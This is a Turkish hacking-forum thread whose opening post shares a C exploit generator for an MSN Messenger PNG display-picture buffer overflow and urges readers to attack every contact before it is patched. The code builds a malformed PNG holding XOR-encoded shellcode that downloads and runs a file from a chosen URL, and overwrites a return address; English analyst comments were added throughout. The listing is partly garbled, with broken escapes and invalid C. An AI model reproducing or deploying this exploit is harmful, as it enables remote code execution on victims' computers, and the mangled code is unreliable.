
göz kırpmasıyla hack

YILMAZ K.
05-27-2006, 02:53 PM
göz kırpmasıyla hack Kulaga Biraz Saçma gibi Gelebilir.!Ama Gerçek
Bir Zamanlar Görüntü Resmi Expoit’i Hazirladi Msn Açiqi Kapatti Kimisi Cam’a Exploit hazirladi Msn Onunda Açigini Kapatti Simdide Göz Kirpmalarinaa Msn Bunuda Açigini Kapatacagindan Emin Olabilirsinizz..! Açik Kapanmadan Sömürün Bütün Msndeki Kisileri

Kod:


/*
*
* MSN Messenger PNG Image Buffer Overflow Download Shellcoded Exploit
* Bug discoveried by Core Security Technologies ( color=#0000ff[Only Registered Users Can See Links] ([Only Registered Users Can See Links]))
* Exploit coded By ATmaCA
* Copyright ?2002-2005 AtmacaSoft Inc. All Rights Reserved.
* E-Mail: atmaca_at_icqmail.com
* Credit to kozan and delikon
* Usage:exploit <OutputPath> <Url>
*
*/

/*
*
* Tested with MSN Messenger 6.2.0137
* This vulnerability can be exploited on Windows 2000 (all service packs)
* and Windows XP (all service packs) that run vulnerable
* clients of MSN Messenger.
*
*/


/*
*
* After creating vuln png image, open
* MSN Messenger and select i**** as your display picture in
* "Tools->Change Display Picture".
*
*/


#include <stdio.h>
#include <stdlib.h>
#include <conio.h>
#include <string.h>



#ifdef __BORLANDC__
#include <mem.h>
#endif


/* Single-byte x86 NOP opcode (0x90); main() writes runs of it as filler
   around the payload. */
#define NOP 0x90


/*
 * Leading bytes of the generated file. Some escapes are garbled in this
 * rendering; the reading below assumes the evident intended byte values.
 *   - 8-byte PNG signature
 *   - IHDR chunk: length 0x0D, 64x64, bit depth 8, colour type 3
 *     (palette-indexed), followed by its 4-byte CRC
 *   - length field 0x000001B9 (441) and type "tRNS" of a second chunk
 *
 * Defensive note: for colour type 3 the PNG specification requires a PLTE
 * chunk before tRNS and allows at most one tRNS entry per palette entry
 * (256 maximum). This header declares 441 bytes and no PLTE is written
 * before it, so a decoder that validates chunk order and length before
 * copying chunk data rejects the file.
 */
char png_header[] =
"\x89\x50\x4E\x47\x0D\x0A\x1A\x0A\x00\x00\x00\x0D\ x 49\x48\x44\x52"
"\x00\x00\x00\x40\x00\x00\x00\x40\x08\x03\x00\x00\ x 00\x9D\xB7\x81"
"\xEC\x00\x00\x01\xB9\x74\x52\x4E\x53";


/*
 * Trailer written last by main(). Despite the name these bytes are not a PNG
 * IEND chunk: main() writes nothing after them, so the generated file has no
 * IEND marker. NOTE(review): they look like x86 code belonging to the
 * payload rather than image structure - confirm in a disassembler.
 */
char pngeof[] = "\x90\x90\x90\x59\xE8\x47\xFE\xFF\xFF";


/*
 * Generic win32 HTTP download shellcode, XOR-encoded with 0x1d; credited in
 * the original listing to delikon (the author's link was replaced by the forum
 * with "[Only Registered Users Can See Links]").
 *
 * Analyst notes, for triage and detection:
 *   - main() searches this array for the byte pair 22 FF, overwrites it with
 *     0xff22 minus (strlen(url) + 1), then appends the XOR-0x1d-encoded URL
 *     and one 0x1d byte (which decodes to a NUL terminator).
 *   - XORing the final eight bytes with 0x1d yields the ASCII string
 *     "mhh.exe" plus NUL - presumably the local file name used for the
 *     download; confirm in a sandbox before relying on it as an indicator.
 *   - Encoded fragments that decode to "urlm" / "on" suggest the payload
 *     loads urlmon.dll - TODO confirm.
 *   - Because the body is XOR-encoded, static signatures have to match the
 *     encoded bytes, not the plaintext strings.
 */
char shellcode[] = "\xEB"
"\x10\x58\x31\xC9\x66\x81\xE9\x22\xFF\x80\x30\x1D\ x 40\xE2\xFA\xEB\x05\xE8\xEB\xFF"
"\xFF\xFF\xF4\xD1\x1D\x1D\x1D\x42\xF5\x4B\x1D\x1D\ x 1D\x94\xDE\x4D\x75\x93\x53\x13"
"\xF1\xF5\x7D\x1D\x1D\x1D\x2C\xD4\x7B\xA4\x72\x73\ x 4C\x75\x68\x6F\x71\x70\x49\xE2"
"\xCD\x4D\x75\x2B\x07\x32\x6D\xF5\x5B\x1D\x1D\x1D\ x 2C\xD4\x4C\x4C\x90\x2A\x4B\x90"
"\x6A\x15\x4B\x4C\xE2\xCD\x4E\x75\x85\xE3\x97\x13\ x F5\x30\x1D\x1D\x1D\x4C\x4A\xE2"
"\xCD\x2C\xD4\x54\xFF\xE3\x4E\x75\x63\xC5\xFF\x6E\ x F5\x04\x1D\x1D\x1D\xE2\xCD\x48"
"\x4B\x79\xBC\x2D\x1D\x1D\x1D\x96\x5D\x11\x96\x6D\ x 01\xB0\x96\x75\x15\x94\xF5\x43"
"\x40\xDE\x4E\x48\x4B\x4A\x96\x71\x39\x05\x96\x58\ x 21\x96\x49\x18\x65\x1C\xF7\x96"
"\x57\x05\x96\x47\x3D\x1C\xF6\xFE\x28\x54\x96\x29\ x 96\x1C\xF3\x2C\xE2\xE1\x2C\xDD"
"\xB1\x25\xFD\x69\x1A\xDC\xD2\x10\x1C\xDA\xF6\xEF\ x 26\x61\x39\x09\x68\xFC\x96\x47"
"\x39\x1C\xF6\x7B\x96\x11\x56\x96\x47\x01\x1C\xF6\ x 96\x19\x96\x1C\xF5\xF4\x1F\x1D"
"\x1D\x1D\x2C\xDD\x94\xF7\x42\x43\x40\x46\xDE\xF5\ x 32\xE2\xE2\xE2\x70\x75\x75\x33"
"\x78\x65\x78\x1D";


/* File-scope state shared by Sifrele() and main(). */

/* Output stream for the generated file; opened in main() from argv[1]. */
FILE *di;
/* Loop counter shared by Sifrele() and main(). */
int i = 0;
/* 16-bit value that main() copies over two bytes inside shellcode[]. */
short int weblength;
/* URL argument; main() sets it to argv[2]. */
char *web;
/* Result of the strstr() search inside shellcode[] performed by main(). */
char *pointer = NULL;
/* Buffer that main() fills with shellcode[] followed by the encoded URL. */
char *newshellcode;


/*xor cryptor*/
/*
 * Sifrele ("encrypt" in Turkish): single-byte XOR obfuscation with key 0x1d,
 * the same key the shellcode[] comment names for the payload encoding.
 * main() passes the URL argument through it before appending it to the
 * payload.
 *
 * Name1:   NUL-terminated string; its length is taken with strlen().
 * returns: the local pointer Name.
 *
 * The loop counter is the file-scope variable i, not a local.
 * NOTE(review): as rendered on this page the loop body is not valid C (the
 * forum software altered the listing); it is reproduced unchanged.
 */
char *Sifrele(char *Name1)
{
char *Name=Name1;
char xor=0x1d;
int Size=strlen(Name);
for(i=0;i<Size;i++)
Name=Name^xor;
return Name;
}



/*
 * Generator entry point. Usage per the listing: exploit <OutputPath> <Url>.
 *
 * Writes to argv[1], in order:
 *   1. png_header (PNG signature, IHDR, start of an oversized tRNS chunk)
 *   2. 99 NOP bytes
 *   3. shellcode[] with the XOR-0x1d-encoded URL (argv[2]) appended
 *   4. NOP padding whose length depends on the URL length
 *   5. four fixed bytes forming the address 0x005E0547 (little-endian)
 *   6. pngeof
 *
 * Defensive notes:
 *   - The output carries no per-chunk CRC for the tRNS data and no IEND
 *     chunk, so a parser that enforces PNG structure rejects it.
 *   - The header comment of the listing names MSN Messenger 6.2.0137 on
 *     Windows 2000 / XP as the tested target; the remedy is to run a fixed
 *     client version. The vendor fix identifier is not given on this page.
 *
 * NOTE(review): as rendered on this page the listing is not valid C (the
 * forum software altered it, and it also uses the C++ `new` operator); the
 * code below is reproduced unchanged.
 */
void main(int argc, char *argv[])
{


/* Fewer than two arguments: print the banner and usage text, then exit. */
if (argc < 3)
{
printf("MSN Messenger PNG Image Buffer Overflow Download Shellcoded Exploit\n");
printf("Bug discoveried by Core Security Technologies ( color=#0000ff[Only Registered Users Can See Links] ([Only Registered Users Can See Links]))\n");
printf("Exploit coded By ATmaCA\n");
printf("Copyright ?2002-2005 AtmacaSoft Inc. All Rights Reserved.\n");
printf("Web: color=#0000ff[Only Registered Users Can See Links] ([Only Registered Users Can See Links])n");
printf("E-Mail: atmaca_at_icqmail.com\n");
printf("Credit to kozan and delikon\n\n");
printf("\tUsage:exploit <OutputPath> <Url>\n");
printf("\tExample:exploit vuln.png color=#0000ff[Only Registered Users Can See Links] ([Only Registered Users Can See Links])");


return;
}



/* Second argument: the URL that is later embedded in the payload. */
web = argv[2];



/* First argument: output path, opened for binary writing. */
if( (di=fopen(argv[1],"wb")) == NULL )
{
printf("Error opening file!\n");
return;
}
/* Emit the header bytes, excluding the string literal's terminating NUL. */
for(i=0;i<sizeof(png_header)-1;i++)
fputc(png_header,di);


/* 99 bytes of NOP filler ahead of the payload. */
for(i=0;i<99;i++)
fputc(NOP,di);


/* Locate the byte pair 22 FF inside shellcode[] and overwrite it with
   0xff22 reduced by the URL length plus one. */
weblength=(short int)0xff22;
pointer=strstr(shellcode,"\x22\xff");
weblength-=strlen(web)+1;
memcpy(pointer,&weblength,2);
/* Build payload = shellcode + XOR-encoded URL + one 0x1d byte
   (0x1d XOR 0x1d = 0, i.e. the encoded string terminator). */
newshellcode = new char[sizeof(shellcode)+strlen(web)+1];
strcpy(newshellcode,shellcode);
strcat(newshellcode,Sifrele(web));
strcat(newshellcode,"\x1d");


/* Write the assembled payload. */
for(i=0;i<strlen(newshellcode);i++)
fputc(newshellcode,di);



for(i=0;i<(83-strlen(web));i++) /* NOP padding; count is 83 minus the URL length */
fputc(NOP,di);


/* Four fixed bytes intended to overwrite the saved return address (EIP). */
/* 0x005E0547 - "ret" per the original comment; written little-endian. */
fputc(0x47,di);
fputc(0x05,di);
fputc(0x5e,di);
fputc(0x00,di);


/* Trailer bytes, excluding the terminating NUL; nothing follows them. */
for(i=0;i<sizeof(pngeof)-1;i++)
fputc(pngeof,di);


printf("Vulnarable png file %s has been generated!\n",argv[1]);


fclose(di);
}

yaren123123
07-01-2007, 08:14 PM
biraz daha konuyu açarmısın tam anlamadım da

xwxserseri
07-01-2007, 08:25 PM
şimdi böle bi açık söz konusu bile olmaz...

boşuna deneme kardeş

Azo Pelo
07-01-2007, 08:53 PM
Sen bunu yap gel bide :D

yaren123123
07-01-2007, 09:12 PM
ya anlamadınız nereye kaydedicem bunu ?mesela (yardımcı olun)



